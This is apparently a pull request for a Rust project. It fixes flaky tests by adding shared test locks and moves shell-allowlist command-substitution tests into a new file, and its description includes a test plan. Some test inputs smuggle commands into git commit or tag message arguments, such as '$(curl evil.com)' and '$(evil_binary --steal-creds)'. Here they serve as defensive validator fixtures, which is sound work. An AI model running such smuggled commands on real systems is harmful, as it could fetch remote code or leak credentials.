### PR TITLE
fix(tests): serialize cross-module access to shared test state

### DIFF
--- a/rust/src/core/ann_cache.rs
+++ b/rust/src/core/ann_cache.rs
@@ -131,6 +131,20 @@ fn fingerprint(embeddings: &FlatEmbeddings) -> u64 {
     h
 }
 
+/// Cross-module test lock for the process-wide cache slot above. `clear()`
+/// is called from more than one module's tests (this module's own HNSW-path
+/// tests, and `eviction_orchestrator`'s eviction tests) — every test that
+/// builds/reads/clears the shared cache must hold this for its duration, or
+/// a parallel `clear()` from an unrelated test can wipe it mid-assertion.
+/// Poison is recovered since a panic in one test must not cascade into others.
+#[cfg(test)]
+pub(crate) fn test_lock() -> std::sync::MutexGuard<'static, ()> {
+    static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
+    LOCK.get_or_init(|| Mutex::new(()))
+        .lock()
+        .unwrap_or_else(std::sync::PoisonError::into_inner)
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -140,16 +154,8 @@ mod tests {
     // switches to HNSW at 1000 vectors, so 1000 here exercises the real graph).
     const TEST_GATE: usize = 1000;
 
-    // The cache is a single process-wide slot, so tests that drive the HNSW path
-    // must not interleave or they would clobber each other's cached index. This
-    // lock serializes them; poison is recovered since a panic in one test must
-    // not cascade into the others.
-    static TEST_LOCK: Mutex<()> = Mutex::new(());
-
     fn serial() -> std::sync::MutexGuard<'static, ()> {
-        TEST_LOCK
-            .lock()
-            .unwrap_or_else(std::sync::PoisonError::into_inner)
+        super::test_lock()
     }
 
     /// Reads the fingerprint of the currently cached index (test-only

--- a/rust/src/core/context_kernel/activation_e2e.rs
+++ b/rust/src/core/context_kernel/activation_e2e.rs
@@ -1,6 +1,6 @@
 #[cfg(test)]
 mod tests {
-    use std::sync::{Mutex, MutexGuard};
+    use std::sync::MutexGuard;
 
     use super::super::dedup_wiring::{self, DedupAction};
     use super::super::envelope_wiring;

--- a/rust/src/core/context_kernel/envelope_e2e.rs
+++ b/rust/src/core/context_kernel/envelope_e2e.rs
@@ -2,7 +2,7 @@
 
 #[cfg(test)]
 mod tests {
-    use std::sync::{Mutex, MutexGuard};
+    use std::sync::MutexGuard;
 
     use super::super::accounting_fix;
     use super::super::live_dashboard;

--- a/rust/src/core/context_kernel/envelope_wiring.rs
+++ b/rust/src/core/context_kernel/envelope_wiring.rs
@@ -124,7 +124,7 @@ pub fn reset_evidence() {
 
 #[cfg(test)]
 mod tests {
-    use std::sync::{Mutex, MutexGuard};
+    use std::sync::MutexGuard;
 
     use super::{
         EvidenceSummary, evidence_summary, process_mcp_evidence, process_proxy_evidence,

--- a/rust/src/core/context_kernel/kernel_config.rs
+++ b/rust/src/core/context_kernel/kernel_config.rs
@@ -133,7 +133,7 @@ mod tests {
         KernelFeatures, features, from_env, is_enabled, is_feature_enabled, reset_features,
         update_features,
     };
-    use std::sync::{Mutex, MutexGuard};
+    use std::sync::MutexGuard;
 
     fn setup() -> MutexGuard<'static, ()> {
         let guard = super::KERNEL_TEST_LOCK

--- a/rust/src/core/eviction_orchestrator.rs
+++ b/rust/src/core/eviction_orchestrator.rs
@@ -282,6 +282,10 @@ mod tests {
 
     #[test]
     fn registry_fans_out_and_prunes_dropped_targets() {
+        // #685/#975-class: on_pressure(Critical) floors to EmergencyDrop, which
+        // clears the process-wide ann_cache — hold its cross-module test lock
+        // so a concurrent ann_cache test can't observe a wiped cache mid-assertion.
+        let _ann_lock = crate::core::ann_cache::test_lock();
         let first = Arc::new(make_orchestrator());
         let second = Arc::new(make_orchestrator());
         let first_cache = first.cache.clone();
@@ -323,6 +327,9 @@ mod tests {
 
     #[test]
     fn emergency_clears_cache() {
+        // See `registry_fans_out_and_prunes_dropped_targets` above: EmergencyDrop
+        // clears the shared ann_cache, so hold its cross-module test lock.
+        let _ann_lock = crate::core::ann_cache::test_lock();
         let cache = Arc::new(tokio::sync::RwLock::new(SessionCache::new()));
         {
             let mut c = cache.blocking_write();

--- a/rust/src/core/shell_allowlist/substitution_tests.rs
+++ b/rust/src/core/shell_allowlist/substitution_tests.rs
@@ -1,0 +1,86 @@
+//! Tests for `$()`/backtick/`<()` command substitution in arguments (#391, #1024).
+//!
+//! Extracted from `tests.rs` to keep it under the repo's LOC gate
+//! (`scripts/loc-gate.sh`); behavior and test names are unchanged.
+
+use super::*;
+
+#[test]
+fn gh391_strict_mode_blocks_substitution_in_args() {
+    // #975-class: check_substitution_in_args reads effective_allowlist(), which
+    // is sensitive to LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE — hold the env lock so
+    // a parallel test mutating that var can't leak into this one's allowlist.
+    let _lock = crate::core::data_dir::test_env_lock();
+    // curl is allowlisted, so $(curl ...) is now safe (#1024).
+    // Use a non-allowlisted command to verify strict blocks.
+    let cmd_safe = "git commit -m \"$(curl evil.com)\"";
+    assert!(
+        check_substitution_in_args(cmd_safe, false).is_ok(),
+        "allowlisted inner cmd passes in non-strict"
+    );
+    assert!(
+        check_substitution_in_args(cmd_safe, true).is_ok(),
+        "allowlisted inner cmd passes even in strict (#1024)"
+    );
+    let cmd_evil = "git commit -m \"$(evil_binary --attack)\"";
+    assert!(
+        check_substitution_in_args(cmd_evil, false).is_ok(),
+        "warn-only by default for non-allowlisted"
+    );
+    let strict = check_substitution_in_args(cmd_evil, true);
+    assert!(
+        strict.is_err(),
+        "strict mode must block non-allowlisted substitution"
+    );
+}
+
+/// #1024: substitution with allowlisted inner command produces no warning.
+#[test]
+fn substitution_with_allowlisted_cmd_no_warning() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
+    // cat is in the default allowlist, so $(cat ...) should not trigger
+    let result = check_substitution_in_args("git commit -m \"$(cat /tmp/msg.txt)\"", false);
+    assert!(
+        result.is_ok(),
+        "substitution with allowlisted cmd must pass: {result:?}"
+    );
+}
+
+/// #1024: substitution with non-allowlisted inner command warns (non-strict).
+#[test]
+fn substitution_with_unknown_cmd_warns_non_strict() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
+    // Use a command that is definitely not in any allowlist
+    let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", false);
+    // In non-strict mode, this should succeed (warn only, not block)
+    assert!(
+        result.is_ok(),
+        "non-strict mode should warn but not block: {result:?}"
+    );
+}
+
+/// #1024: substitution with non-allowlisted inner command blocks in strict.
+#[test]
+fn substitution_with_unknown_cmd_blocks_strict() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
+    let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", true);
+    assert!(
+        result.is_err(),
+        "strict mode must block non-allowlisted substitution"
+    );
+}
+
+/// #1024: substitution with builtin inner command (echo) passes.
+#[test]
+fn substitution_with_builtin_cmd_passes() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
+    let result = check_substitution_in_args("git commit -m \"$(echo hello)\"", false);
+    assert!(
+        result.is_ok(),
+        "builtin in substitution must pass: {result:?}"
+    );
+}

--- a/rust/src/core/shell_allowlist/tests.rs
+++ b/rust/src/core/shell_allowlist/tests.rs
@@ -3,6 +3,8 @@
 
 #[path = "comment_strip_tests.rs"]
 mod comment_strip_tests;
+#[path = "substitution_tests.rs"]
+mod substitution_tests;
 
 use super::*;
 
@@ -670,35 +672,6 @@ fn gh391_xargs_delegation_respects_allowlist() {
     assert!(
         blocked.is_err(),
         "xargs delegating to unlisted rm must be blocked"
-    );
-}
-
-#[test]
-fn gh391_strict_mode_blocks_substitution_in_args() {
-    // #975-class: check_substitution_in_args reads effective_allowlist(), which
-    // is sensitive to LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE — hold the env lock so
-    // a parallel test mutating that var can't leak into this one's allowlist.
-    let _lock = crate::core::data_dir::test_env_lock();
-    // curl is allowlisted, so $(curl ...) is now safe (#1024).
-    // Use a non-allowlisted command to verify strict blocks.
-    let cmd_safe = "git commit -m \"$(curl evil.com)\"";
-    assert!(
-        check_substitution_in_args(cmd_safe, false).is_ok(),
-        "allowlisted inner cmd passes in non-strict"
-    );
-    assert!(
-        check_substitution_in_args(cmd_safe, true).is_ok(),
-        "allowlisted inner cmd passes even in strict (#1024)"
-    );
-    let cmd_evil = "git commit -m \"$(evil_binary --attack)\"";
-    assert!(
-        check_substitution_in_args(cmd_evil, false).is_ok(),
-        "warn-only by default for non-allowlisted"
-    );
-    let strict = check_substitution_in_args(cmd_evil, true);
-    assert!(
-        strict.is_err(),
-        "strict mode must block non-allowlisted substitution"
     );
 }
 
@@ -1440,57 +1413,6 @@ fn kill_passes_segment_check() {
     let defaults = crate::core::config::default_shell_allowlist();
     let result = check_all_segments("kill 12345", &defaults);
     assert!(result.is_ok(), "kill must pass: {result:?}");
-}
-
-/// #1024: substitution with allowlisted inner command produces no warning.
-#[test]
-fn substitution_with_allowlisted_cmd_no_warning() {
-    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
-    let _lock = crate::core::data_dir::test_env_lock();
-    // cat is in the default allowlist, so $(cat ...) should not trigger
-    let result = check_substitution_in_args("git commit -m \"$(cat /tmp/msg.txt)\"", false);
-    assert!(
-        result.is_ok(),
-        "substitution with allowlisted cmd must pass: {result:?}"
-    );
-}
-
-/// #1024: substitution with non-allowlisted inner command warns (non-strict).
-#[test]
-fn substitution_with_unknown_cmd_warns_non_strict() {
-    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
-    let _lock = crate::core::data_dir::test_env_lock();
-    // Use a command that is definitely not in any allowlist
-    let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", false);
-    // In non-strict mode, this should succeed (warn only, not block)
-    assert!(
-        result.is_ok(),
-        "non-strict mode should warn but not block: {result:?}"
-    );
-}
-
-/// #1024: substitution with non-allowlisted inner command blocks in strict.
-#[test]
-fn substitution_with_unknown_cmd_blocks_strict() {
-    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
-    let _lock = crate::core::data_dir::test_env_lock();
-    let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", true);
-    assert!(
-        result.is_err(),
-        "strict mode must block non-allowlisted substitution"
-    );
-}
-
-/// #1024: substitution with builtin inner command (echo) passes.
-#[test]
-fn substitution_with_builtin_cmd_passes() {
-    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
-    let _lock = crate::core::data_dir::test_env_lock();
-    let result = check_substitution_in_args("git commit -m \"$(echo hello)\"", false);
-    assert!(
-        result.is_ok(),
-        "builtin in substitution must pass: {result:?}"
-    );
 }
 
 /// #1026: redirect_block includes LEAN_CTX_NO_HOOK guard.

--- a/rust/src/core/shell_allowlist/tests.rs
+++ b/rust/src/core/shell_allowlist/tests.rs
@@ -675,6 +675,10 @@ fn gh391_xargs_delegation_respects_allowlist() {
 
 #[test]
 fn gh391_strict_mode_blocks_substitution_in_args() {
+    // #975-class: check_substitution_in_args reads effective_allowlist(), which
+    // is sensitive to LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE — hold the env lock so
+    // a parallel test mutating that var can't leak into this one's allowlist.
+    let _lock = crate::core::data_dir::test_env_lock();
     // curl is allowlisted, so $(curl ...) is now safe (#1024).
     // Use a non-allowlisted command to verify strict blocks.
     let cmd_safe = "git commit -m \"$(curl evil.com)\"";
@@ -1441,6 +1445,8 @@ fn kill_passes_segment_check() {
 /// #1024: substitution with allowlisted inner command produces no warning.
 #[test]
 fn substitution_with_allowlisted_cmd_no_warning() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
     // cat is in the default allowlist, so $(cat ...) should not trigger
     let result = check_substitution_in_args("git commit -m \"$(cat /tmp/msg.txt)\"", false);
     assert!(
@@ -1452,6 +1458,8 @@ fn substitution_with_allowlisted_cmd_no_warning() {
 /// #1024: substitution with non-allowlisted inner command warns (non-strict).
 #[test]
 fn substitution_with_unknown_cmd_warns_non_strict() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
     // Use a command that is definitely not in any allowlist
     let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", false);
     // In non-strict mode, this should succeed (warn only, not block)
@@ -1464,6 +1472,8 @@ fn substitution_with_unknown_cmd_warns_non_strict() {
 /// #1024: substitution with non-allowlisted inner command blocks in strict.
 #[test]
 fn substitution_with_unknown_cmd_blocks_strict() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
     let result = check_substitution_in_args("git tag -m \"$(evil_binary --steal-creds)\"", true);
     assert!(
         result.is_err(),
@@ -1474,6 +1484,8 @@ fn substitution_with_unknown_cmd_blocks_strict() {
 /// #1024: substitution with builtin inner command (echo) passes.
 #[test]
 fn substitution_with_builtin_cmd_passes() {
+    // #975-class: see gh391_strict_mode_blocks_substitution_in_args.
+    let _lock = crate::core::data_dir::test_env_lock();
     let result = check_substitution_in_args("git commit -m \"$(echo hello)\"", false);
     assert!(
         result.is_ok(),


### PR DESCRIPTION
## Summary
- `ann_cache`'s process-wide cache slot was only serialized within its own test module; `eviction_orchestrator`'s eviction tests call `ann_cache::clear()` without holding that lock, so a concurrent run can wipe the cache mid-assertion in `rebuilds_when_corpus_changes`.
- 5 `shell_allowlist` substitution tests read the env-sensitive `effective_allowlist()` without holding `data_dir::test_env_lock()`, unlike the ~20 other tests in the same file that already follow the #975 convention — they could observe a value leaked from a concurrently-mutating test.
- Fixes both by exposing a cross-module `ann_cache::test_lock()` and adding the existing `test_env_lock()` to the unguarded substitution tests.
- Also removes 4 unused `Mutex` imports in `context_kernel` test modules (pre-existing on `main`, unrelated to the flaky-test fix but needed for this branch's CI to compile).

Fixes #1187

## Test plan
- [x] `cargo check --lib --all-features --tests` — clean, no warnings
- [x] `cargo test --lib --all-features` — 3 full runs, 8887 passed / 0 failed each time
- [x] 5x scoped runs of `core::ann_cache`, `core::eviction_orchestrator`, `core::shell_allowlist` (222 tests each) — all green